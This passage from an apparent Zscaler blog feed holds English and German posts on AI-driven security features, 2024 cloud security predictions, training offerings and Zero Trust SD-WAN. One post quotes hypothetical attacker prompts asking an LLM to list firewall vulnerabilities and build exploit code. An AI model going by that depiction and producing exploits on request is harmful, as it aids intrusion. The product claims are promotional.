blocked are safe and needed for work. This is a productivity drain as users cannot access legitimate sites for work, resulting in unnecessary helpdesk tickets. AI Smart Isolation determines when a site might be risky and open it in isolation. This means organizations don't have to overblock sites to support productivity and can also maintain a strong web security posture. Stage 3: Lateral movement Once inside an organization, attackers attempt to move laterally to gain access to sensitive data. Zscaler's AI innovation reduces potential blast radius by employing automated app segmentation based on analysis of user access patterns to limit lateral movement risk. For instance, if we see only 250 of 4,500 employees accessing a finance application, we will use this data to automatically create an app segment that limits access to only those 250 employees, thus reducing potential blast radius and lateral movement opportunity by ~94 percent. Stage 4: Data exfiltration The final stage of an attack involves the unauthorized exfiltration of sensitive data from a company. Zscaler uses AI to allow companies to deploy data protections faster to protect sensitive data. With AI-driven data discovery, organizations no longer struggle with the time-consuming task of data fingerprinting and classification that delays deployment. Innovative data discovery automatically finds and classifies all data out of the box. This means data is classified as sensitive information immediately, so it can be protected right away from potential exfiltration and data breaches Zscaler's AI-driven security products provide organizations with robust protection across the four key stages of an attack. We also rely on AI to deliver cybersecurity maturity assessments as part of our Risk360 cyber risk management product. Rest assured, we are busy thinking, building, and adding new AI capabilities every day, so there is more to come, as AI-powered security is becoming indispensable in safeguarding organizations against cyberthreats. Fri, 26 Jan 2024 08:00:01 -0800 Dan Gould Prognosen für 2024 zum Themenkomplex Cybersicherheit für Cloud-Workloads Im Jahr 2023 erlebte der Markt für Cloud-Sicherheit einen rasanten Wandel, bei dem jeder Aspekt des Ökosystems — Anbieter, Produkte und Infrastruktur — signifikante Veränderungen durchlaufen hat. Für 2024 ist mit einer Weiterentwicklung der Cybersicherheit für Workloads (VMs, Container und Services) in öffentlichen Cloud-Umgebungen zu rechnen, da Kunden mit der Herausforderung konfrontiert sind, die betriebswirtschaftliche Notwendigkeit eines möglichst zügigen Wechsels in die Cloud mit den Compliance- und Sicherheitsanforderungen des Unternehmens in Einklang zu bringen. Entsprechend erwarten CIOs und CISOs von ihren Teams, eine Sicherheitsplattform aufzubauen, die über die erforderlichen Kapazitäten verfügt, um Einzelprodukte zu konsolidieren, mehrere Cloud-Umgebungen (insbesondere AWS, Azure und GCP) zu unterstützen und die bedarfsgerechte Skalierung von Sicherheitsservices durch Automatisierung zu ermöglichen. Zero-Trust-Architekturen werden damit zunehmend zum Wegbereiter für Datenschutz in Echtzeit, zentrale Richtliniendurchsetzung und Absicherung von Cloud-Workloads. Hier sind die 5 wichtigsten Trends, die sich unserer Meinung nach im Jahr 2024 durchsetzen werden. 1. Laterale Ausbreitung von Bedrohungen aus On-Premise-Umgebungen in die Cloud wird zunehmen In der Cloud befinden sich die wertvollsten Ressourcen von Unternehmen – Anwendungen und Daten. Angreifer setzen innovative Techniken ein, die das On-Premise-Netzwerk eines Unternehmens kompromittieren und lateral in dessen Cloud-Domain eindringen. Diese Techniken erfreuen sich bei Bedrohungsakteuren zunehmender Beliebtheit, da On-Premise- und öffentliche Cloud-Umgebungen weiterhin inkonsistent sind. Ein vom Microsoft Security Research Team beschriebener Angriff (Quelle: MERCURY und DEV-1084: Destruktiver Angriff auf eine hybride Umgebung) veranschaulicht diesen Trend. Die Bedrohungsakteure kompromittierten zunächst zwei autorisierte Konten und nutzten diese dann, um den Azure Active Directory (Azure AD) Connect-Agent zu manipulieren. Zwei Wochen vor der Bereitstellung der Ransomware nutzten die Bedrohungsakteure ein kompromittiertes Konto mit hoher Berechtigungsstufe, um Zugriff auf das Gerät zu erhalten, auf dem der Azure AD Connect-Agent installiert war. Wir gehen mit hoher Wahrscheinlichkeit davon aus, dass die Bedrohungsakteure anschließend das Tool AADInternals verwendet haben, um die Klartext-Anmeldedaten eines autorisierten Azure AD-Kontos zu extrahieren. Diese Anmeldedaten wurden anschließend verwendet, um von der angegriffenen On-Premise-Umgebung auf die Azure AD-Umgebung zu wechseln. Abb.: On-Premise-Kompromittierung verlagert sich auf die öffentliche Cloud 2. Serverlose Services werden die Angriffsfläche deutlich vergrößern Serverlose Funktionen bieten eine enorme Einfachheit und ermöglichen es Entwicklern, sich ausschließlich auf das Schreiben und Bereitstellen von Code zu konzentrieren, ohne sich um die zugrunde liegende Infrastruktur zu kümmern. Die Einführung von Microservices-basierten Architekturen wird die Verwendung von serverlosen Funktionen aufgrund ihrer Wiederverwendbarkeit und der Möglichkeit, die Anwendungsentwicklung zu beschleunigen, weiter vorantreiben. Allerdings bergen serverlose Funktionen ein erhebliches Sicherheitsrisiko, da sie mit verschiedenen Eingabe- und Ereignisquellen interagieren und häufig HTTP- oder API-Aufrufe zur Auslösung von Aktionen benötigen. Zudem nutzen sie Cloud-Ressourcen wie Blob- oder Blockspeicher, verwenden Queues, um Interaktionen mit anderen Funktionen zu sequenzieren, und stellen Verbindungen zu Geräten her. Diese Berührungspunkte erhöhen die Angriffsfläche, da viele von ihnen nicht vertrauenswürdige Nachrichtenformate beinhalten und keine angemessene Überwachung oder Überprüfung für den standardmäßigen Schutz der Anwendungsebene bieten. Abb.: Serverlose Funktionen können auf den gesamten Stack zusätzlicher Services zugreifen, wodurch eine große Angriffsfläche entsteht  3. Identitätsbasierte Sicherheitsrichtlinien werden im Hinblick auf den Schutz öffentlicher Clouds neu definiert Mit der zunehmenden Verbreitung von Workloads in öffentlichen Clouds wird jeder CSP eigene, unterschiedliche Identitätsfunktionen bereitstellen. Anders als bei Active Directory für User gibt es in diesem Kontext keine Einheitslösung. IT-Abteilungen werden auch weiterhin mit unzusammenhängenden Identitätsprofilen für Workloads On-Premise, in der privaten sowie der öffentlichen Cloud zu kämpfen haben. Abgesehen davon werden Sicherheitsteams im Jahr 2024 weiterhin mit mehreren Workload-Attributen zu tun haben, um ihre Sicherheitsrichtlinien zu erstellen, und Abstraktionen auf höherer Ebene (wie benutzerdefinierte Tags) werden sich immer mehr durchsetzen. Dies wird die Konsistenz zwischen Cybersicherheit und anderen Ressourcenmanagementfunktionen (Abrechnung, Zugriffskontrolle, Authentifizierung und Reporting) für Cloud-Workloads fördern. Abb.: Userdefinierte Tags werden für die Implementierung einer Zero-Trust-Architektur zur Absicherung von Workloads in der Cloud verwendet  4. Unternehmen werden cloudbasierte Sicherheitsplattformen, die mehrere öffentliche Clouds unterstützen, prüfen und einsetzen Die Einstellung von Mitarbeitern und der Aufbau von Architekturen, die auf die Absicherung der einzelnen öffentlichen Clouds zugeschnitten sind, wird die Sicherheitsteams dazu veranlassen, die für sie am besten geeigneten Lösungen zu finden. Unternehmen werden Tools von CSPs wie Cloud-Firewall-Einzellösungen testen, aber die Nachfrage nach Architekturen, die eine Zentralisierung der Festlegung, Durchsetzung und Korrektur von Cloud-Sicherheitsrichtlinien unterstützen, wird steigen. Nur wenn Cyberschutz über eine zentrale Plattform bereitgestellt wird, kann er auf alle Workloads angewendet werden — und nicht nur auf einige ausgewählte. 5. Viele CIOs wollen sich nicht zwischen AWS, Azure und GCP entscheiden müssen – entsprechend werden Sicherheitstools benötigt, die den Anforderungen von Multicloud-Umgebungen gewachsen sind. Was die Best Practices der Anbieter betrifft, so sind CIOs bestrebt, ihr Cloud-Infrastruktur-Portfolio zu diversifizieren. Auf diese Weise können sie die Abhängigkeit von einem einzigen Anbieter verringern, die durch Fusionen und Übernahmen übernommene Infrastruktur integrieren und die besten Services aus verschiedenen öffentlichen Clouds wie Google Cloud BigQuery für Datenanalysen, AWS für mobile Anwendungen und Oracle Cloud für ERP nutzen. Abb.: Das AWS-Framework für geteilte Verantwortung zum Schutz von Cloud-Ressourcen. [Quelle] Das Konzept der „geteilten Verantwortung“ für die Cybersicherheit erfreut sich bei Cloud-Anbietern ungebrochener Beliebtheit. Im Klartext heißt das: Der Kunde trägt selbst die Verantwortung für die Implementierung einer Sicherheitsinfrastruktur zum Schutz seiner Cloud-Ressourcen. Erfahrene IT-Beauftragte achten bei der Auswahl einer geeigneten Cybersicherheitsplattform darauf, dass sie mehrere öffentliche Cloud-Umgebungen unterstützen kann. Kunden möchten keinesfalls separate Sicherheitstools für jede öffentliche Cloud verwenden — sie werden vielmehr eine Plattform für alle Anforderungen nutzen. Die Bereitstellung von Workloads in der öffentlichen Cloud ist kein neuer Trend in der Unternehmenswelt, aber das Thema der Sicherheit von Cloud-Workloads wird immer aktueller. Zwar gibt es noch keine eindeutigen Antworten, aber es gibt durchaus ein paar Hinweise darauf, wohin sich Unternehmen im Jahr 2024 orientieren werden. Und zwar in Richtung Zero Trust, da dieses Konzept schnell unmittelbare Vorteile bietet und ein solides Framework für die Sicherheit von Cloud-Workloads in der Zukunft darstellt. Möchten Sie mehr über Zero Trust für Cloud-Workloads erfahren? Klicken Sie hier, um weitere Perspektiven von Zscaler zu erhalten. Dieser Beitrag ist Teil einer Blogreihe, die einen Ausblick auf das Thema Zugriff und Sicherheit im Jahr 2024 liefert. Im nächsten Beitrag aus dieser Reihe geht es um Prognosen rund um Zero Trust. Zukunftsgerichtete Aussagen Dieser Blogbeitrag enthält zukunftsgerichtete Aussagen, die auf den Überzeugungen und Einschätzungen unserer Geschäftsführung sowie auf gegenwärtig vorliegenden Informationen beruhen. Zukunftsgerichtete Aussagen sind erkennbar an Formulierungen wie „glauben“, „dürften“, „werden“, „potentiell“, „einschätzen“, „fortsetzen“, „voraussichtlich“, „beabsichtigen“, „könnten“, „würden“ „projizieren“, „planen“, „erwarten“ oder ähnlichen Begriffen, die die Ungewissheit zukünftiger Ereignisse oder Ergebnisse zum Ausdruck bringen sollen. Insbesondere handelt es sich dabei um Aussagen, die sich auf Prognosen über die Entwicklung der Cybersicherheitsbranche im Kalenderjahr 2024 sowie auf unsere Fähigkeit beziehen, die entsprechenden Marktchancen gewinnbringend zu nutzen. Zudem geht es dabei um erwartete Vorteile und die zunehmende Verbreitung von „As-a-Service-Modellen“ und Zero-Trust-Architekturen zur Bekämpfung von Cyberbedrohungen sowie um die Möglichkeiten von künstlicher Intelligenz und maschinellem Lernen, die Reaktionszeiten für Erkennung und Behebung zu verkürzen und Cyberbedrohungen proaktiv zu identifizieren sowie zu stoppen. Diese zukunftsgerichteten Aussagen unterliegen den „Safe Harbor“-Bestimmungen im Sinne des US-amerikanischen Private Securities Litigation Reform Act von 1995. Diese zukunftsgerichteten Aussagen unterliegen einer Reihe von Risiken, Ungewissheiten und Annahmen sowie einer Vielzahl von Faktoren, die dazu führen können, dass die tatsächlichen Ergebnisse wesentlich von den in diesem Blogbeitrag getroffenen Vorhersagen abweichen. Insbesondere gilt dies für Sicherheitsrisiken und Entwicklungen, von denen Zscaler zum Zeitpunkt der Veröffentlichung dieses Beitrags keine Kenntnis hatte, sowie für die Annahmen, die unseren Prognosen in Bezug auf die Cybersicherheitsbranche im Kalenderjahr 2024 zugrunde liegen. Risiken und Unwägbarkeiten, die für das Geschäft von Zscaler spezifisch sind, werden in unserem jüngsten Quartalsbericht auf Formular 10-Q dargelegt, den wir am 7. Dezember 2022 bei der Securities and Exchange Commission (SEC) eingereicht haben und der auf unserer Website unter  und auf der Website der SEC unter verfügbar ist. Alle zukunftsgerichteten Aussagen in dieser Veröffentlichung basieren auf den begrenzten Informationen, die Zscaler zum Zeitpunkt der Veröffentlichung zur Verfügung stehen und die sich ändern können, und Zscaler verpflichtet sich nicht, die in diesem Blog gemachten zukunftsgerichteten Aussagen zu aktualisieren, selbst wenn in der Zukunft neue Informationen verfügbar werden, es sei denn, dies ist gesetzlich vorgeschrieben. Thu, 25 Jan 2024 08:00:02 -0800 Sakthi Chandra Zscaler Academy: Reflecting on 2023 and Soaring into 2024 2023 was a year of transformation and innovation for Zscaler Academy. We reimagined cybersecurity education, tailoring it to the evolving landscape of zero trust security. As we begin 2024, it's time to reflect on what we've achieved and show you what's on the horizon 2023: Building the Pillars of Zero Trust Learning New Training and Offerings: We revamped our curriculum, introducing the Zscaler for Users learning path and specializations in Data Protection, Cyberthreat Protection, and Workloads. Hands-on labs, live virtual training, and engaging workshops became the norm, bridging the gap between theory and practice. New Approach: We embraced a learner-centric approach, catering to diverse learning styles and preferences. Self-paced e-learning, interactive webinars, and immersive workshops offered flexibility and depth, empowering individuals at all levels. Certification: We evolved our certification program, aligning it with the latest zero trust advancements, and introduced an industry-standard third-party proctored certification exam. The Zscaler Digital Transformation Administrator (ZDTA) certification exam is the final step in the Zscaler for Users - Essentials learning path, and supports the journey of any security professional to validate their understanding of deploying and implementing the Zscaler Zero Trust Exchange platform. Roadshows and Virtual Training: We took Zscaler Academy on the road, hosting virtual and in-person events like Zscaler Training Roadshows and Virtual Training workshops around the globe. These interactive sessions fostered connections, knowledge sharing, and a sense of community among Zscaler users and partners A Year of Bridging the Cybersecurity Skills Gap Customers: We empowered customers to maximize the value of their Zscaler investments. Our training equipped administrators, security professionals, and end users with the skills to confidently navigate the Zero Trust Exchange. Partners: We supported our partners in their growth journey. The Partner Academy provided the knowledge and expertise needed to build successful Zscaler practices and deliver exceptional customer service. Workforce of the Future: We invested in the future by inspiring and equipping the next generation of cybersecurity professionals. Our initiatives are contributing to closing the cybersecurity skills gap, ensuring a talent pool prepared for the zero trust era through the Zscaler Academic Alliance Program. The New Charter Era: What Awaits in 2024 Micro-Learning and Micro-Credentials: We're embracing bite-sized learning, offering micro-credentials for specific skills. This agile approach will allow you to stay ahead of the curve and acquire targeted knowledge on the go. New Certifications: We'll be expanding our certification portfolio, introducing new paths that validate expertise in specific Zscaler solutions and emerging security domains. More Training Courses and Events: We'll continue to diversify our offerings, adding new training courses (like Ransomware Protection, Deception, Troubleshooting, and more), live workshops, and virtual events. Expect deeper dives into specific technologies, industry trends, and best practices. Personalized Learning: We're committed to personalization, utilizing data and insights to tailor learning recommendations and experiences to your individual needs and goals The Future Is Zero Trust, and Zscaler Academy Is Your Guide As we step into 2024, Zscaler Academy remains your trusted partner on your zero trust journey. We'll continue to innovate, adapt, and empower you with the knowledge and skills to thrive in the dynamic security landscape. Stay tuned for exciting announcements and updates! We're dedicated to making Zscaler Academy the leading destination for zero trust education, ensuring you're always prepared to secure your future in the age of zero trust. Join us in 2024! Let's keep learning, growing, and building a safer digital world together Wed, 24 Jan 2024 08:00:01 -0800 Prameet Chhabra Navigating the Intersection of Cybersecurity and AI: Key Predictions for 2024 This article also appeared in VentureBeat. Anticipating the future is a complex endeavor, however, I'm here to offer insights into potential trends that could shape the ever-evolving cybersecurity landscape in 2024. We engage with over 40% of Fortune 500 companies and I personally have conversations with thousands of CXOs each year which provides me a unique view into the possibilities that might impact the security landscape. Let's explore these potential trends and see what the future of cybersecurity might look like. 1. Generative AI will increase ransomware attacks: The utilization of GenAI technologies will expedite the identification of vulnerable targets, enabling cybercriminals to launch ransomware attacks with greater ease and sophistication. Before, when launching a cyberattack, hackers had to spend time to identify an organization's attack surface and potential vulnerabilities that can be exploited in internet-facing applications and services. However, with the advent of LLMs, the landscape has dramatically shifted. Now, a hacker can simply ask a straightforward question like, "Show me vulnerabilities for all firewalls for [a given organization] in a table format.” And the next command could be, “Build me exploit code for this firewall," and the task at hand becomes significantly easier. GenAI can also help identify vulnerabilities among your supply chain partners and optimal paths that are connected to your network. It's important to recognize that even if you strengthen your own estate, vulnerabilities may still exist through other entry points, potentially making them the easiest targets for attacks. The combination of social engineering exploits and GenAI technology will result in a surge of cyber breaches, characterized by enhanced quality, diversity, and quantity. This will create a feedback loop that facilitates iterative improvements, making these breaches even more sophisticated and challenging to mitigate. Defense Strategy: Using the Zscaler Zero Trust Exchange, customers can make their applications invisible to potential attackers, reducing the attack surface. If you can’t be reached, you can’t be breached. 2. AI will be used to fight AI: We will be witnessing a promising development where AI is being harnessed by security providers to combat the ever-evolving nature of AI-driven attacks. Enterprises generate a vast amount of logs containing signals that could indicate potential attacks. However, isolating these signals in a timely manner has been challenging due to signal-to-noise issues. With the advent of GenAI technologies, we now have the capability to identify potential avenues of attack more effectively. By leveraging GenAI, we can enhance triage and protection measures by understanding which vulnerabilities hackers are likely to exploit. Additionally, this technology enables us to detect attackers and exploits in near real-time. As a result, cloud security providers will develop AI-powered tools to proactively prevent potential areas of exploitation. In addition, with the advent of AI and ML tools, we have the capability to predict and identify potential vulnerabilities in an organization that are likely to be exploited. This will help reduce cyber breaches. Defense Strategy: Zscaler is building tools such as breach predictors that could predict and prevent breaches powered by communication logs. Before any breach happens there is always reconnaissance activity. Because Zscaler sits in the middle of all communications, we have visibility into potential threats. This allows us to understand if a hacker has infiltrated an enterprise, and if so, suggest steps to prevent a breach. 3. The rise of firewall-free enterprises: Organizations are coming to a realization that despite significant investments in firewalls and VPNs, their security posture remains vulnerable. They are understanding that a true Zero Trust architecture has to be implemented. Realizing the inherent security risks and false sense of security provided by firewall-based approaches, customers will move away from Firewall and VPN as their main security technology. Over the next few years, firewalls will become archaic like mainframes. Organizations are awakening to the need for a more comprehensive and effective cybersecurity strategy. The coming years will witness the significant acceleration in the adoption and implementation of Zero Trust architecture and the rise of "firewall-free enterprises.” This transformative shift represents a crucial inflection point in the cybersecurity landscape. Defense Strategy: This shift reflects a changing approach to cybersecurity, driven by the understanding that a firewall-centric approach is ineffective in safeguarding against evolving threats, prompting customers to seek true Zscaler Zero Trust solutions. 4. Broader adoption of Zero Trust segmentation: The number one cause of ransomware attacks is a flat network. Once hackers are on the network, they can easily move laterally and find high-value assets and encrypt them and ask for ransom. Organizations have been trying to implement network-based segmentation to eliminate lateral movement. I have talked to hundreds of CISOs but have yet to meet one who has successfully completed network-based segmentation or microsegmentation. It is too cumbersome to implement and operationalize. In 2023, hundreds of enterprises successfully implemented the initial phase of Zero Trust architecture. Moving into 2024, we anticipate a broader adoption of Zero Trust-based segmentation. This approach simplifies implementation so you don’t need to create network segments and you use Zero Trust technology to connect a certain group of applications to a certain group of applications. Defense Strategy: Zscaler offers Zero Trust segmentation in two areas: User-to-application segmentation Application-to-application segmentation 5. Zero Trust SD-WAN will start to replace traditional SD-WAN: SD-WAN has helped enterprises save money by using the internet—a cheaper transport. But SD-WANs have not improved security, as they allow lateral threat movement. Zero Trust SD-WAN doesn’t put users on the network, it simply makes a point-to-point connection between users and applications, hence eliminating lateral threat movement. This protects enterprises from ransomware attacks. Zero Trust SD-WAN will emerge as an important technology to provide highly reliable, highly secure and seamless connectivity. Zero Trust SD-WAN also reduces the overhead as enterprises no longer have to worry about managing route tables. Zero Trust SD-WAN makes every branch office like an internet cafe or a coffee shop, your employees can access any application without having to extend your network to every branch office. Defense Strategy: Zscaler offers a Zero Trust SD-WAN solution that is easy to implement with a Plug-n-Play appliance. 6. SEC regulations will drive far more active participation of Board members and CFOs for cyber risk reduction: Recognizing the damage that cyber breaches could cause to businesses, these key stakeholders will more actively engage in cybersecurity initiatives and decision-making processes. The increased involvement of CFOs and Boards of Directors in cybersecurity underscores the recognition that it is not solely a CIO or CISO’s responsibility, but a vital element of overall organizational resilience and risk management. Newly introduced SEC disclosure requirements will serve as a catalyst for boards to become more engaged in driving cybersecurity initiatives in their companies. More companies will require at least one board member with a strong background in cybersecurity. Defense Strategy: Through Zscaler Risk360, we provide a holistic risk score for an organization which highlights the contributing factors to your cyber risk and compares your risk score with your peers with trends over time. In addition, Zscaler has added SEC disclosure reports generated by GenAI, leveraging contributing factors that have been used to compute your company's risk score. Mon, 22 Jan 2024 15:31:59 -0800 Jay Chaudhry Zero Trust für Ihre Zweigstellen In den letzten fünf Jahren hat sich die Technologiebranche stark gewandelt. Unter den unzähligen Veränderungen hinsichtlich des Umgangs von Unternehmen mit Technologie, um sich einen Wettbewerbsvorteil zu verschaffen, hatten drei wesentliche Entwicklungen tiefgreifende Auswirkungen: Migration von Anwendungen aus herkömmlichen Rechenzentren in die Cloud (der Durchbruch von SaaS) Hybride Arbeitsmodelle, bei denen Mitarbeiter sowohl in regionalen Büros als auch an Remote-Standorten arbeiten Zunehmende Nutzung von IoT-/OT-Geräten in Fabriken und Zweigstellen Viele Unternehmen stellen fest, dass sie aufgrund von Einschränkungen in ihrer WAN-Infrastruktur und Lücken in der Netzwerksicherheit nicht in der Lage sind, mit diesen drei Entwicklungen umzugehen. Herkömmliche SD-WANs vergrößern die Angriffsfläche und begünstigen die laterale Ausbreitung von Bedrohungen. Sie verbinden verschiedene Standorte über Site-to-Site-VPNs oder Routing-Overlays und etablieren so implizites Vertrauen, das selbst kompromittierten Entitäten uneingeschränkten Zugriff auf wichtige Geschäftsressourcen gewährt. Darüber hinaus sorgen grobmaschige Segmentierungsrichtlinien dafür, dass sich Bedrohungen problemlos innerhalb des Netzwerks bewegen können. Angesichts der steigenden Zahl von Bedrohungen und der zunehmenden Nutzung von IoT-/OT-Geräten, die für das Netzwerk oft unsichtbar sind, müssen Unternehmen sicherstellen, dass ihre WAN-Infrastruktur den Zero-Trust-Prinzipien entspricht. Herkömmliche WAN-Infrastrukturen bestehen aus mehreren Einzelprodukten wie Routern, Firewalls und VPNs, was erhebliche Verwaltungsprobleme mit sich bringen kann. Daher benötigen Unternehmen, die eine Umstrukturierung ihrer Zweigstellen vornehmen, eine Lösung, die auf schlanke Zweigstellen und eine leistungsfähige Cloud setzt, um den Verwaltungsaufwand zu reduzieren. Zscaler Zero Trust SD-WAN verbindet Zweigstellen, Fabriken und Rechenzentren sicher und unkompliziert ganz ohne VPNs und stellt Usern, IoT-/OT-Geräten und Servern Zero-Trust-Zugriff bereit. Mit Zero Trust SD-WAN können Unternehmen eine schlanke Zweigstelle einrichten, in der unnötige Geräte durch eine einfache Plug-and-Play-Appliance ersetzt werden, die ganz einfach über eine Internetverbindung bereitgestellt werden kann. Abbildung 1: Herkömmliches SD-WAN und Zero Trust SD-WAN im Vergleich  Zero Trust SD-WAN beseitigt Geschäftsrisiken Im Gegensatz zu herkömmlichen SD-WANs, die das Netzwerk auf Remote-Standorte, Clouds und externe User ausdehnen, verbindet Zero Trust SD-WAN User, IoT-/OT-Geräte und Anwendungen mit Ressourcen, auf die sie zugreifen dürfen, ohne Routing-Overlays zu benötigen. Auf diese Weise entsteht ein Zero-Trust-Netzwerk, das die Angriffsfläche minimiert und die laterale Ausbreitung von Bedrohungen unterbindet. Da der gesamte Traffic über die Zscaler Zero Trust Exchange geleitet wird, gibt es keine öffentlich zugänglichen IP-Adressen oder VPN-Ports, die Hacker angreifen könnten. Ein aktueller Report von Zscaler ThreatLabz zeigt, dass die Zahl der IoT- und OT-basierten Malware-Angriffe seit 2022 um 400 % gestiegen ist. Dies verdeutlicht, wie wichtig es für Unternehmen ist, die Transparenz und Sicherheit der in ihren Netzwerken eingesetzten IoT-/OT-Geräte zu erhöhen. Leider werden diese oft außer Acht gelassen, wenn Administratoren Sicherheitsrichtlinien für User in Zweigstellen entwickeln. Wie der ThreatLabz-Report jedoch darlegt, stellen diese Geräte einen entscheidenden Bedrohungsvektor dar. Zero Trust SD-WAN bietet vollständigen Einblick in die Geräte, sodass Unternehmen einen detaillierten Überblick über alle IoT-/OT-Geräte sowie Informationen über die Anwendungen, mit denen sie kommunizieren, erhalten. Außerdem müssen Administratoren keine separaten Richtlinien für User und Geräte mehr erstellen, da dieselben Richtlinien konsistent auf beide Entitäten angewendet werden können. Abbildung 2: Erkennung und Klassifizierung von IoT-Geräten Viele Unternehmen nutzen Server-zu-Client-Kommunikation. So muss beispielsweise ein Druckserver in einem Rechenzentrum einen Druckbefehl an einen Remote-Drucker in einer Zweigstelle senden. Dank Zero Trust SD-WAN müssen sich Unternehmen keine Sorgen über ungeschützte Services-Ports machen, die ein Hacker ausnutzen könnte, um in das Netzwerk einzudringen. Die gesamte Zweigstellenkommunikation wird über die Zero Trust Exchange abgewickelt, die die Verbindung zwischen dem Druckserver und dem Remote-Drucker herstellt. Durch die Ausweitung der Zero-Trust-Sicherheit auf alle Entitäten wie User, IoT-/OT-Geräte und Server wird die gesamte Sicherheit erhöht. Zero Trust SD-WAN ersetzt Site-to-Site-VPNs Herkömmliche SD-WANs verbinden Standorte (z. B. Zweigstellen, Fabriken und Rechenzentren) über IPsec-VPN-Tunnel. Durch Routing-Overlays kann jedes Gerät mit allen anderen Geräten, Servern oder Anwendungen kommunizieren, wodurch die Erreichbarkeit zwischen Usern, Geräten und Anwendungen sichergestellt wird — ein Umstand, den Hacker ausnutzen können, um einfach auf andere Ressourcen im Netzwerk zuzugreifen. Mit Zero Trust SD-WAN wird der Traffic von Zweigstellen direkt an die Zero Trust Exchange weitergeleitet, wo Richtlinien von Zscaler Internet Access (ZIA) oder Zscaler Private Access (ZPA) für eine vollständige Sicherheitsüberprüfung und identitätsbasierte Zugriffskontrolle angewendet werden können. Zero Trust SD-WAN vereinfacht die Kommunikation in Zweigstellen mit einem Zero-Trust-Netzwerk-Overlay, das flexible Weiterleitung und einfache Richtlinienverwaltung gewährleistet, erheblich. Abbildung 3: Ersatz für Site-to-Site-VPNs Zero Trust SD-WAN vereinfacht Fusionen und Übernahmen Die Zusammenführung von zwei getrennten Unternehmen kann zu einer höheren Effizienz, einer verstärkten Marktpräsenz und anderen Vorteilen führen. Allerdings ist die Integration neuer Systeme und Routing-Domains in die bestehende Umgebung manchmal ein langsamer, mühsamer Prozess, der sich über mehrere Monate hinziehen kann. Mit Zscaler kann der gesamte Integrationsprozess nach einer Fusion oder Übernahme viel einfacher und schneller ablaufen. Zero Trust SD-WAN kommuniziert nur mit der Zero Trust Exchange, sodass die Routing-Domains zwischen bestehenden und übernommenen Standorten nicht zusammengeführt werden müssen. Durch den Einsatz von Zero Trust SD-WAN an einem übernommenen Standort können Unternehmen den Traffic an die Zero Trust Exchange leiten, die die Verbindung vermittelt und die Kommunikation absichert. Das Ergebnis: Schon am ersten Tag funktionieren alle Abläufe problemlos und neue Standorte werden innerhalb weniger Wochen oder sogar Tage eingebunden. Abbildung 4: Integration nach Fusionen und Übernahmen Wie funktioniert das alles? Den im ZPA-Portal definierten Anwendungen wird eine synthetische IP-Adresse zugewiesen. Sobald ein User über die synthetische IP eine Verbindung zu der neuen Anwendung initiiert, sendet Zero Trust SD-WAN in dieser Zweigstelle Traffic an die Zero Trust Exchange. Am übernommenen Standort, an dem die Anwendung gehostet wird, initiiert der App Connector (in Zero Trust SD-WAN integriert) eine Inside-Out-Verbindung zur Zero Trust Exchange. Die Zero Trust Exchange vermittelt daraufhin die Verbindung zwischen User und Anwendung.  Fazit Unternehmen benötigen eine Networking-Lösung, die sie vor den heutzutage immer häufiger auftretenden Cyberbedrohungen schützt. Herkömmliche SD-WANs erhöhen jedoch das Sicherheitsrisiko und die Komplexität des Netzwerks. Im Gegensatz dazu überträgt Zero Trust SD-WAN die Zero-Trust-Prinzipien auf WANs, indem User, IoT-/OT-Geräte und Server sicher miteinander verbunden werden. Um die Sicherheit von Zweigstellen, Fabriken und Rechenzentren zu verbessern, müssen Unternehmen von herkömmlichen flachen Netzwerken mit implizitem Vertrauen auf Zero-Trust-Netzwerke umsteigen. Die Implementierung von Zero Trust SD-WAN bietet zahlreiche Vorteile, wie z. B. die Minimierung von Cyberrisiken, die Verringerung von Kosten und Komplexität, die Verbesserung der geschäftlichen Agilität und die Bereitstellung einer SASE-Lösung aus einer Hand. Weitere Informationen finden Sie auf der Webseite zu Zscaler Zero Trust SD-WAN. Mon, 22 Jan 2024 17:50:01 -0800 Karan Dagar Jetzt neu: Zero Trust SASE Transformation der Arbeitswelt und der IT Die Arbeitswelt entwickelt sich rasant weiter, und hybride Arbeitsformen sind inzwischen die neue Normalität. Legacy-Netzwerkarchitekturen wurden für ein statisches Arbeitsmodell konzipiert, bei dem sich die User an festen Standorten befanden. Die Zweigstellen von heute sehen ganz anders aus — mit Desk Hoteling, Co-Working-Spaces, mobilen Mitarbeitern und internetzentrierter Konnektivität. So wie sich die Zweigstellen entwickeln, muss auch die Netzwerkinfrastruktur, über die sie verbunden sind, angepasst werden. Legacy-Netzwerke bringen Risiken & Komplexität mit sich Das herkömmliche Konnektivitätsmodell ist sehr netzwerkzentriert — User, Geräte und Server verbinden sich mit einem Netzwerk, und dieses stellt den Zugriff auf jedes andere Gerät im selben Netzwerk sicher. Dieses Modell beinhaltet zu viel implizites Vertrauen. Jedes Gerät kann standardmäßig mit jedem anderen Gerät oder Server kommunizieren, was die laterale Ausbreitung von Bedrohungen und Angriffen wie Ransomware begünstigt. Darüber hinaus muss bei netzwerkzentrierter Konnektivität das Netzwerk über VPN-Tunnel auf öffentliche Clouds und externe User ausgedehnt werden, wodurch sich die Angriffsfläche auf Infrastrukturen ausweiten kann, die Sie nicht direkt kontrollieren. Mit der zunehmenden Verbreitung von IoT-Geräten in Unternehmen wird auch das Management der Angriffsfläche immer komplexer. Der Einsatz von Routing-Overlays und herkömmlichen Routing-Protokollen führt zu zusätzlicher Komplexität in den Netzwerken. Herkömmliches SD-WAN ist kein Zero Trust SD-WANs verfolgen ebenfalls einen netzwerkzentrierten Ansatz und nutzen Routing-Overlays mit Site-to-Site-VPN-Tunneln und Routing-Protokollen. Somit können Unternehmen zwar teure MPLS-Netzwerke abschaffen und viele betriebliche Herausforderungen lösen, aber SD-WANs führen auch zu Sicherheitsrisiken, da sie laterale Bewegungen zulassen. Um diese Risiken unter Kontrolle zu halten, ist eine netzwerkbasierte Segmentierung erforderlich, die oft zusätzliche Firewall-Appliances in Zweigstellen und komplexe netzwerkbasierte Sicherheitsrichtlinien voraussetzt. Zero Trust ist eine Cybersicherheitsstrategie, die davon ausgeht, dass keine Entität automatisch als vertrauenswürdig eingestuft werden sollte, und die den Zugriff auf bestimmte Ressourcen nur auf Grundlage von Identität, Kontext und Status erlaubt. Dies widerspricht grundlegend der Funktionsweise herkömmlicher Netzwerke. Zwar lässt sich das Vertrauen in herkömmlichen Netzwerken durch Techniken wie Segmentierung und Zugriffskontrolle einschränken, doch können diese Ansätze die Komplexität erheblich erhöhen. Die Zeit ist reif für einen neuen Ansatz – basierend auf Zero-Trust-Prinzipien Jetzt neu: Zero Trust SD-WAN Ich habe bereits unsere Branch-Connector-Appliances für die Verbindung von Zweigstellen über die 